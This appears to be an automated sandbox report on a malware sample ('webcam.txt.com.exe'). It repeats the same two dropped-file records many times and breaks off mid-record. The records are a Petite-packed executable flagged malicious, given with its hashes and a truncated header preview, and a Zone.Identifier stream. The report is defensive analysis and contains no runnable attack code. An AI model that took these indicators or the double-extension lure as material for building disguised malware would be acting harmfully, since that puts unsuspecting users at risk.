                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
